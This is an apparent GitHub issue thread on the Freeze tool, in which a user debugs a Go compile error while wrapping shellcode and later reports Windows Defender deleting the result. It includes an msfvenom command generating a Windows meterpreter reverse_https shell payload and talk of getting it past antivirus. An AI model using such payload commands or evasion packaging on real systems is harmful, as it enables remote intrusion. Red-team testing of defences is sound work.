### ISSUE TITLE
unknown escape when trying to generate the output file

### ISSUE THREAD

**Issue by kluo84** [optiv/Freeze#1]
![image](https://user-images.githubusercontent.com/15222944/192835428-18b70df2-7468-4d57-bf9f-82f019d53678.png)
I got the error when trying to compile the output 
```
exit status 1: go list error: exit status 2: # Freeze/freeze_shell.exefldr
./freeze_shell.exe.go:120:40: unknown escape
```
raw shell is generate with 
`msfvenom -p windows/x64/meterpreter/reverse_https LHOST=# LPORT=443 -f raw -o shell.txt`

**Comment by Tylous** [comment]
Hello,
for the `-process` flag you do not need to specify the path just the application name in system32. I also see you have a single quote between Windows and System32

**Comment by kluo84** [comment]
Thank you. It worked now...at first the file didn't get deleted by Win defender, after execution, the Win Defender picked it up and deleted it.
